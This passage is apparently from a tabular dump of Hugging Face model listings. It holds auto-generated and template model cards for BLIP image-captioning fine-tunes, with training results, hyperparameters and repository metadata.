|
| 367 |
+
|:-------------:|:-----:|:----:|:---------------:|:---------:|
|
| 368 |
+
| 6.7457 | 5.0 | 50 | 3.7819 | 0.9091 |
|
| 369 |
+
| 1.9042 | 10.0 | 100 | 0.6590 | 0.9091 |
|
| 370 |
+
| 0.3114 | 15.0 | 150 | 0.2169 | 0.9091 |
|
| 371 |
+
|
| 372 |
+
|
| 373 |
+
### Framework versions
|
| 374 |
+
|
| 375 |
+
- Transformers 4.44.2
|
| 376 |
+
- Pytorch 2.4.1+cu121
|
| 377 |
+
- Datasets 3.0.1
|
| 378 |
+
- Tokenizers 0.19.1
|
| 379 |
+
","{""id"": ""shyamgv/blip-image-captioning-large-shyam"", ""author"": ""shyamgv"", ""sha"": ""958a0374add78913e6ecce580b0b971aa7d806a3"", ""last_modified"": ""2024-10-03 14:11:15+00:00"", ""created_at"": ""2024-09-30 14:42:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""dataset:imagefolder"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-image-captioning-large-shyam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip""}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct01_18-23-28_8f759df9fa64/events.out.tfevents.1727807009.8f759df9fa64.368.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct01_20-35-32_3338b107fa91/events.out.tfevents.1727814934.3338b107fa91.506.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct02_22-05-24_7dfcaf8596c2/events.out.tfevents.1727906747.7dfcaf8596c2.275.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct03_13-54-36_fd3d0fddb05e/events.out.tfevents.1727963690.fd3d0fddb05e.1650.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-03 14:11:15+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""66fab8cf0369576de8e0bf08"", ""modelId"": ""shyamgv/blip-image-captioning-large-shyam"", ""usedStorage"": 16911185228}",1,https://huggingface.co/shyamgv/blip-image-captioning-large-shyam-shyam,1,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=shyamgv/blip-image-captioning-large-shyam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshyamgv%2Fblip-image-captioning-large-shyam%5D(%2Fshyamgv%2Fblip-image-captioning-large-shyam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 380 |
+
shyamgv/blip-image-captioning-large-shyam-shyam,"---
|
| 381 |
+
library_name: transformers
|
| 382 |
+
license: bsd-3-clause
|
| 383 |
+
base_model: shyamgv/blip-image-captioning-large-shyam
|
| 384 |
+
tags:
|
| 385 |
+
- generated_from_trainer
|
| 386 |
+
datasets:
|
| 387 |
+
- imagefolder
|
| 388 |
+
model-index:
|
| 389 |
+
- name: blip-image-captioning-large-shyam-shyam
|
| 390 |
+
results: []
|
| 391 |
+
---
|
| 392 |
+
|
| 393 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 394 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 395 |
+
|
| 396 |
+
# blip-image-captioning-large-shyam-shyam
|
| 397 |
+
|
| 398 |
+
This model is a fine-tuned version of [shyamgv/blip-image-captioning-large-shyam](https://huggingface.co/shyamgv/blip-image-captioning-large-shyam) on the imagefolder dataset.
|
| 399 |
+
It achieves the following results on the evaluation set:
|
| 400 |
+
- Loss: 0.0044
|
| 401 |
+
- Wer Score: 0.1111
|
| 402 |
+
|
| 403 |
+
## Model description
|
| 404 |
+
|
| 405 |
+
More information needed
|
| 406 |
+
|
| 407 |
+
## Intended uses & limitations
|
| 408 |
+
|
| 409 |
+
More information needed
|
| 410 |
+
|
| 411 |
+
## Training and evaluation data
|
| 412 |
+
|
| 413 |
+
More information needed
|
| 414 |
+
|
| 415 |
+
## Training procedure
|
| 416 |
+
|
| 417 |
+
### Training hyperparameters
|
| 418 |
+
|
| 419 |
+
The following hyperparameters were used during training:
|
| 420 |
+
- learning_rate: 5e-05
|
| 421 |
+
- train_batch_size: 2
|
| 422 |
+
- eval_batch_size: 2
|
| 423 |
+
- seed: 42
|
| 424 |
+
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
|
| 425 |
+
- lr_scheduler_type: linear
|
| 426 |
+
- num_epochs: 15
|
| 427 |
+
- mixed_precision_training: Native AMP
|
| 428 |
+
|
| 429 |
+
### Training results
|
| 430 |
+
|
| 431 |
+
| Training Loss | Epoch | Step | Validation Loss | Wer Score |
|
| 432 |
+
|:-------------:|:-------:|:----:|:---------------:|:---------:|
|
| 433 |
+
| 0.0104 | 2.9412 | 50 | 0.0041 | 0.1111 |
|
| 434 |
+
| 0.0025 | 5.8824 | 100 | 0.0049 | 0.1111 |
|
| 435 |
+
| 0.0003 | 8.8235 | 150 | 0.0056 | 0.1667 |
|
| 436 |
+
| 0.0002 | 11.7647 | 200 | 0.0045 | 0.1111 |
|
| 437 |
+
| 0.0001 | 14.7059 | 250 | 0.0044 | 0.1111 |
|
| 438 |
+
|
| 439 |
+
|
| 440 |
+
### Framework versions
|
| 441 |
+
|
| 442 |
+
- Transformers 4.46.0.dev0
|
| 443 |
+
- Pytorch 2.4.1+cu121
|
| 444 |
+
- Datasets 3.0.1
|
| 445 |
+
- Tokenizers 0.20.0
|
| 446 |
+
","{""id"": ""shyamgv/blip-image-captioning-large-shyam-shyam"", ""author"": ""shyamgv"", ""sha"": ""0c61d2794e1d3c5cb7545502816e2e27208d647b"", ""last_modified"": ""2024-10-02 16:00:01+00:00"", ""created_at"": ""2024-10-02 15:40:34+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""blip"", ""image-text-to-text"", ""generated_from_trainer"", ""dataset:imagefolder"", ""base_model:shyamgv/blip-image-captioning-large-shyam"", ""base_model:finetune:shyamgv/blip-image-captioning-large-shyam"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: shyamgv/blip-image-captioning-large-shyam\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam-shyam\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""blip-image-captioning-large-shyam-shyam"", ""results"": []}], ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip""}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Oct02_15-40-33_08293887d125/events.out.tfevents.1727883635.08293887d125.537.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-02 16:00:01+00:00"", ""cardData"": ""base_model: shyamgv/blip-image-captioning-large-shyam\ndatasets:\n- imagefolder\nlibrary_name: transformers\nlicense: bsd-3-clause\ntags:\n- generated_from_trainer\nmodel-index:\n- name: blip-image-captioning-large-shyam-shyam\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""66fd6972bddfcf0a2b2600c5"", ""modelId"": ""shyamgv/blip-image-captioning-large-shyam-shyam"", ""usedStorage"": 9395100034}",2,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=shyamgv/blip-image-captioning-large-shyam-shyam&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshyamgv%2Fblip-image-captioning-large-shyam-shyam%5D(%2Fshyamgv%2Fblip-image-captioning-large-shyam-shyam)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 447 |
+
welcometoFightclub/llmachatbot,"---
|
| 448 |
+
license: apache-2.0
|
| 449 |
+
language:
|
| 450 |
+
- en
|
| 451 |
+
base_model:
|
| 452 |
+
- Salesforce/blip-image-captioning-large
|
| 453 |
+
pipeline_tag: image-to-text
|
| 454 |
+
tags:
|
| 455 |
+
- code
|
| 456 |
+
---
|
| 457 |
+
|
| 458 |
+
# Model Card for Model ID
|
| 459 |
+
|
| 460 |
+
<!-- Provide a quick summary of what the model is/does. -->
|
| 461 |
+
|
| 462 |
+
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
|
| 463 |
+
|
| 464 |
+
## Model Details
|
| 465 |
+
|
| 466 |
+
### Model Description
|
| 467 |
+
|
| 468 |
+
<!-- Provide a longer summary of what this model is. -->
|
| 469 |
+
|
| 470 |
+
|
| 471 |
+
|
| 472 |
+
- **Developed by:** [More Information Needed]
|
| 473 |
+
- **Funded by [optional]:** [More Information Needed]
|
| 474 |
+
- **Shared by [optional]:** [More Information Needed]
|
| 475 |
+
- **Model type:** [More Information Needed]
|
| 476 |
+
- **Language(s) (NLP):** [More Information Needed]
|
| 477 |
+
- **License:** [More Information Needed]
|
| 478 |
+
- **Finetuned from model [optional]:** [More Information Needed]
|
| 479 |
+
|
| 480 |
+
### Model Sources [optional]
|
| 481 |
+
|
| 482 |
+
<!-- Provide the basic links for the model. -->
|
| 483 |
+
|
| 484 |
+
- **Repository:** [More Information Needed]
|
| 485 |
+
- **Paper [optional]:** [More Information Needed]
|
| 486 |
+
- **Demo [optional]:** [More Information Needed]
|
| 487 |
+
|
| 488 |
+
## Uses
|
| 489 |
+
|
| 490 |
+
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
|
| 491 |
+
|
| 492 |
+
### Direct Use
|
| 493 |
+
|
| 494 |
+
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
|
| 495 |
+
|
| 496 |
+
[More Information Needed]
|
| 497 |
+
|
| 498 |
+
### Downstream Use [optional]
|
| 499 |
+
|
| 500 |
+
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
|
| 501 |
+
|
| 502 |
+
[More Information Needed]
|
| 503 |
+
|
| 504 |
+
### Out-of-Scope Use
|
| 505 |
+
|
| 506 |
+
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
|
| 507 |
+
|
| 508 |
+
[More Information Needed]
|
| 509 |
+
|
| 510 |
+
## Bias, Risks, and Limitations
|
| 511 |
+
|
| 512 |
+
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
|
| 513 |
+
|
| 514 |
+
[More Information Needed]
|
| 515 |
+
|
| 516 |
+
### Recommendations
|
| 517 |
+
|
| 518 |
+
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
|
| 519 |
+
|
| 520 |
+
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
|
| 521 |
+
|
| 522 |
+
## How to Get Started with the Model
|
| 523 |
+
|
| 524 |
+
Use the code below to get started with the model.
|
| 525 |
+
|
| 526 |
+
[More Information Needed]
|
| 527 |
+
|
| 528 |
+
## Training Details
|
| 529 |
+
|
| 530 |
+
### Training Data
|
| 531 |
+
|
| 532 |
+
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
|
| 533 |
+
|
| 534 |
+
[More Information Needed]
|
| 535 |
+
|
| 536 |
+
### Training Procedure
|
| 537 |
+
|
| 538 |
+
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
|
| 539 |
+
|
| 540 |
+
#### Preprocessing [optional]
|
| 541 |
+
|
| 542 |
+
[More Information Needed]
|
| 543 |
+
|
| 544 |
+
|
| 545 |
+
#### Training Hyperparameters
|
| 546 |
+
|
| 547 |
+
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
|
| 548 |
+
|
| 549 |
+
#### Speeds, Sizes, Times [optional]
|
| 550 |
+
|
| 551 |
+
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
|
| 552 |
+
|
| 553 |
+
[More Information Needed]
|
| 554 |
+
|
| 555 |
+
## Evaluation
|
| 556 |
+
|
| 557 |
+
<!-- This section describes the evaluation protocols and provides the results. -->
|
| 558 |
+
|
| 559 |
+
### Testing Data, Factors & Metrics
|
| 560 |
+
|
| 561 |
+
#### Testing Data
|
| 562 |
+
|
| 563 |
+
<!-- This should link to a Dataset Card if possible. -->
|
| 564 |
+
|
| 565 |
+
[More Information Needed]
|
| 566 |
+
|
| 567 |
+
#### Factors
|
| 568 |
+
|
| 569 |
+
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
|
| 570 |
+
|
| 571 |
+
[More Information Needed]
|
| 572 |
+
|
| 573 |
+
#### Metrics
|
| 574 |
+
|
| 575 |
+
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
|
| 576 |
+
|
| 577 |
+
[More Information Needed]
|
| 578 |
+
|
| 579 |
+
### Results
|
| 580 |
+
|
| 581 |
+
[More Information Needed]
|
| 582 |
+
|
| 583 |
+
#### Summary
|
| 584 |
+
|
| 585 |
+
|
| 586 |
+
|
| 587 |
+
## Model Examination [optional]
|
| 588 |
+
|
| 589 |
+
<!-- Relevant interpretability work for the model goes here -->
|
| 590 |
+
|
| 591 |
+
[More Information Needed]
|
| 592 |
+
|
| 593 |
+
## Environmental Impact
|
| 594 |
+
|
| 595 |
+
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
|
| 596 |
+
|
| 597 |
+
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
|
| 598 |
+
|
| 599 |
+
- **Hardware Type:** [More Information Needed]
|
| 600 |
+
- **Hours used:** [More Information Needed]
|
| 601 |
+
- **Cloud Provider:** [More Information Needed]
|
| 602 |
+
- **Compute Region:** [More Information Needed]
|
| 603 |
+
- **Carbon Emitted:** [More Information Needed]
|
| 604 |
+
|
| 605 |
+
## Technical Specifications [optional]
|
| 606 |
+
|
| 607 |
+
### Model Architecture and Objective
|
| 608 |
+
|
| 609 |
+
[More Information Needed]
|
| 610 |
+
|
| 611 |
+
### Compute Infrastructure
|
| 612 |
+
|
| 613 |
+
[More Information Needed]
|
| 614 |
+
|
| 615 |
+
#### Hardware
|
| 616 |
+
|
| 617 |
+
[More Information Needed]
|
| 618 |
+
|
| 619 |
+
#### Software
|
| 620 |
+
|
| 621 |
+
[More Information Needed]
|
| 622 |
+
|
| 623 |
+
## Citation [optional]
|
| 624 |
+
|
| 625 |
+
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
|
| 626 |
+
|
| 627 |
+
**BibTeX:**
|
| 628 |
+
|
| 629 |
+
[More Information Needed]
|
| 630 |
+
|
| 631 |
+
**APA:**
|
| 632 |
+
|
| 633 |
+
[More Information Needed]
|
| 634 |
+
|
| 635 |
+
## Glossary [optional]
|
| 636 |
+
|
| 637 |
+
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
|
| 638 |
+
|
| 639 |
+
[More Information Needed]
|
| 640 |
+
|
| 641 |
+
## More Information [optional]
|
| 642 |
+
|
| 643 |
+
[More Information Needed]
|
| 644 |
+
|
| 645 |
+
## Model Card Authors [optional]
|
| 646 |
+
|
| 647 |
+
[More Information Needed]
|
| 648 |
+
|
| 649 |
+
## Model Card Contact
|
| 650 |
+
|
| 651 |
+
[More Information Needed]","{""id"": ""welcometoFightclub/llmachatbot"", ""author"": ""welcometoFightclub"", ""sha"": ""8d11c646cb045355065cb1f490a5b5ab89917aec"", ""last_modified"": ""2024-10-01 15:13:59+00:00"", ""created_at"": ""2024-10-01 15:03:53+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""code"", ""image-to-text"", ""en"", ""arxiv:1910.09700"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: image-to-text\ntags:\n- code"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-10-01 15:13:59+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: image-to-text\ntags:\n- code"", ""transformersInfo"": null, ""_id"": ""66fc0f598b49b3fbed4455f3"", ""modelId"": ""welcometoFightclub/llmachatbot"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=welcometoFightclub/llmachatbot&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BwelcometoFightclub%2Fllmachatbot%5D(%2FwelcometoFightclub%2Fllmachatbot)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 652 |
+
Jakapong/jakudon,"---
|
| 653 |
+
base_model:
|
| 654 |
+
- Salesforce/blip-image-captioning-large
|
| 655 |
+
---
|
| 656 |
+
|
| 657 |
+
# Model Card for Model ID
|
| 658 |
+
|
| 659 |
+
<!-- Provide a quick summary of what the model is/does. -->
|
| 660 |
+
|
| 661 |
+
This modelcard aims to be a base template for new models. It has been generated using [this raw template](https://github.com/huggingface/huggingface_hub/blob/main/src/huggingface_hub/templates/modelcard_template.md?plain=1).
|
| 662 |
+
|
| 663 |
+
## Model Details
|
| 664 |
+
|
| 665 |
+
### Model Description
|
| 666 |
+
|
| 667 |
+
<!-- Provide a longer summary of what this model is. -->
|
| 668 |
+
|
| 669 |
+
|
| 670 |
+
|
| 671 |
+
- **Developed by:** [More Information Needed]
|
| 672 |
+
- **Funded by [optional]:** [More Information Needed]
|
| 673 |
+
- **Shared by [optional]:** [More Information Needed]
|
| 674 |
+
- **Model type:** [More Information Needed]
|
| 675 |
+
- **Language(s) (NLP):** [More Information Needed]
|
| 676 |
+
- **License:** [More Information Needed]
|
| 677 |
+
- **Finetuned from model [optional]:** [More Information Needed]
|
| 678 |
+
|
| 679 |
+
### Model Sources [optional]
|
| 680 |
+
|
| 681 |
+
<!-- Provide the basic links for the model. -->
|
| 682 |
+
|
| 683 |
+
- **Repository:** [More Information Needed]
|
| 684 |
+
- **Paper [optional]:** [More Information Needed]
|
| 685 |
+
- **Demo [optional]:** [More Information Needed]
|
| 686 |
+
|
| 687 |
+
## Uses
|
| 688 |
+
|
| 689 |
+
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
|
| 690 |
+
|
| 691 |
+
### Direct Use
|
| 692 |
+
|
| 693 |
+
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
|
| 694 |
+
|
| 695 |
+
[More Information Needed]
|
| 696 |
+
|
| 697 |
+
### Downstream Use [optional]
|
| 698 |
+
|
| 699 |
+
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
|
| 700 |
+
|
| 701 |
+
[More Information Needed]
|
| 702 |
+
|
| 703 |
+
### Out-of-Scope Use
|
| 704 |
+
|
| 705 |
+
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
|
| 706 |
+
|
| 707 |
+
[More Information Needed]
|
| 708 |
+
|
| 709 |
+
## Bias, Risks, and Limitations
|
| 710 |
+
|
| 711 |
+
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
|
| 712 |
+
|
| 713 |
+
[More Information Needed]
|
| 714 |
+
|
| 715 |
+
### Recommendations
|
| 716 |
+
|
| 717 |
+
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
|
| 718 |
+
|
| 719 |
+
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
|
| 720 |
+
|
| 721 |
+
## How to Get Started with the Model
|
| 722 |
+
|
| 723 |
+
Use the code below to get started with the model.
|
| 724 |
+
|
| 725 |
+
[More Information Needed]
|
| 726 |
+
|
| 727 |
+
## Training Details
|
| 728 |
+
|
| 729 |
+
### Training Data
|
| 730 |
+
|
| 731 |
+
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
|
| 732 |
+
|
| 733 |
+
[More Information Needed]
|
| 734 |
+
|
| 735 |
+
### Training Procedure
|
| 736 |
+
|
| 737 |
+
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
|
| 738 |
+
|
| 739 |
+
#### Preprocessing [optional]
|
| 740 |
+
|
| 741 |
+
[More Information Needed]
|
| 742 |
+
|
| 743 |
+
|
| 744 |
+
#### Training Hyperparameters
|
| 745 |
+
|
| 746 |
+
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
|
| 747 |
+
|
| 748 |
+
#### Speeds, Sizes, Times [optional]
|
| 749 |
+
|
| 750 |
+
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
|
| 751 |
+
|
| 752 |
+
[More Information Needed]
|
| 753 |
+
|
| 754 |
+
## Evaluation
|
| 755 |
+
|
| 756 |
+
<!-- This section describes the evaluation protocols and provides the results. -->
|
| 757 |
+
|
| 758 |
+
### Testing Data, Factors & Metrics
|
| 759 |
+
|
| 760 |
+
#### Testing Data
|
| 761 |
+
|
| 762 |
+
<!-- This should link to a Dataset Card if possible. -->
|
| 763 |
+
|
| 764 |
+
[More Information Needed]
|
| 765 |
+
|
| 766 |
+
#### Factors
|
| 767 |
+
|
| 768 |
+
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
|
| 769 |
+
|
| 770 |
+
[More Information Needed]
|
| 771 |
+
|
| 772 |
+
#### Metrics
|
| 773 |
+
|
| 774 |
+
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
|
| 775 |
+
|
| 776 |
+
[More Information Needed]
|
| 777 |
+
|
| 778 |
+
### Results
|
| 779 |
+
|
| 780 |
+
[More Information Needed]
|
| 781 |
+
|
| 782 |
+
#### Summary
|
| 783 |
+
|
| 784 |
+
|
| 785 |
+
|
| 786 |
+
## Model Examination [optional]
|
| 787 |
+
|
| 788 |
+
<!-- Relevant interpretability work for the model goes here -->
|
| 789 |
+
|
| 790 |
+
[More Information Needed]
|
| 791 |
+
|
| 792 |
+
## Environmental Impact
|
| 793 |
+
|
| 794 |
+
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
|
| 795 |
+
|
| 796 |
+
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
|
| 797 |
+
|
| 798 |
+
- **Hardware Type:** [More Information Needed]
|
| 799 |
+
- **Hours used:** [More Information Needed]
|
| 800 |
+
- **Cloud Provider:** [More Information Needed]
|
| 801 |
+
- **Compute Region:** [More Information Needed]
|
| 802 |
+
- **Carbon Emitted:** [More Information Needed]
|
| 803 |
+
|
| 804 |
+
## Technical Specifications [optional]
|
| 805 |
+
|
| 806 |
+
### Model Architecture and Objective
|
| 807 |
+
|
| 808 |
+
[More Information Needed]
|
| 809 |
+
|
| 810 |
+
### Compute Infrastructure
|
| 811 |
+
|
| 812 |
+
[More Information Needed]
|
| 813 |
+
|
| 814 |
+
#### Hardware
|
| 815 |
+
|
| 816 |
+
[More Information Needed]
|
| 817 |
+
|
| 818 |
+
#### Software
|
| 819 |
+
|
| 820 |
+
[More Information Needed]
|
| 821 |
+
|
| 822 |
+
## Citation [optional]
|
| 823 |
+
|
| 824 |
+
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
|
| 825 |
+
|
| 826 |
+
**BibTeX:**
|
| 827 |
+
|
| 828 |
+
[More Information Needed]
|
| 829 |
+
|
| 830 |
+
**APA:**
|
| 831 |
+
|
| 832 |
+
[More Information Needed]
|
| 833 |
+
|
| 834 |
+
## Glossary [optional]
|
| 835 |
+
|
| 836 |
+
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
|
| 837 |
+
|
| 838 |
+
[More Information Needed]
|
| 839 |
+
|
| 840 |
+
## More Information [optional]
|
| 841 |
+
|
| 842 |
+
[More Information Needed]
|
| 843 |
+
|
| 844 |
+
## Model Card Authors [optional]
|
| 845 |
+
|
| 846 |
+
[More Information Needed]
|
| 847 |
+
|
| 848 |
+
## Model Card Contact
|
| 849 |
+
|
| 850 |
+
[More Information Needed]","{""id"": ""Jakapong/jakudon"", ""author"": ""Jakapong"", ""sha"": ""8adf83c45bb7f311ae78fec2ca3beade4445fab5"", ""last_modified"": ""2025-01-09 04:52:49+00:00"", ""created_at"": ""2025-01-09 04:51:22+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""arxiv:1910.09700"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-09 04:52:49+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large"", 